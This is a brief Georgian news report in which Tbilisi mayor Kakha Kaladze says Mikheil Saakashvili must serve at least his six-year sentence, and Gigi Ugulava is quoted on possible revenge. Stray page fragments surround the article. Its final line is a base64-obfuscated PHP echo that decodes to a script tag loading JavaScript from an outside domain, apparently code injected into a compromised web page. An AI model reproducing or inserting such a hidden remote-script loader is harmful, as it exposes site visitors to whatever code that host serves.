celsiusi
ავერსი საქკაბელი
თბილისის მერმა, კახა კალაძემ განაცხადა, რომ მიხეილ სააკაშვილს აუცილებლად მოუწევს სასჯელის მოხდა, სულ მცირე იმის, რაც აქვს მისჯილი, დანარჩენი კი სხვა საქმეებზე მიმდინარე გამოძიების დასრულების შემდეგ გახდება ცნობილი.
 
მისი თქმით, სააკაშვილს სულ მცირე ექვსი წლის გატარება მოუწევს ციხეში.
 
„მინდა, დავამშვიდო „ნაციონალური მოძრაობა“, რომ მიხეილ სააკაშვილს აუცილებლად მოუწევს სასჯელის მოხდა, სულ მცირე იმის, რაც აქვს მისჯილი, დანარჩენი დაველოდოთ სხვა საქმეებზე მიმდინარე გამოძიებას,იცით, რომ ექვსი წელი მისჯილი აქვს, სხვა საქმეებზე გამოძიება მიმდინარეობს და არ არის გამორიცხული, რომ მას დაემატოს სასჯელი. შესაბამისად, მას აუცილებლად მოუწევს პასუხისგება იმ ჩადენილ დანაშაულებზე. გიგი უგულავას, კიდევ ერთხელ ვიმეორებ, თუ რაიმე არასწორი ქმედებები იქნება, არ აქვს მნიშვნელობა უგულავა იქნება, პეტრე, პავლე, ამას მოჰყვება შესაბამისი სამართლებრივი რეაგირება“, – განაცხადა კალაძემ.
 
მიხეილ სააკაშვილთან დაკავშირებით საუბრისას გიგი უგულავამ განაცახდა, რომ სააკაშვილი ციხეში რომ გარდაიცვალოს, თავად ჩაერთვება შურისძიებაში. უგულავას თქმით, ხელისუფლებას ბოლომდე არ აქვს ამ თემასთან დაკავშირებული სიტუაცია გაცნობიერებული.
1211
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");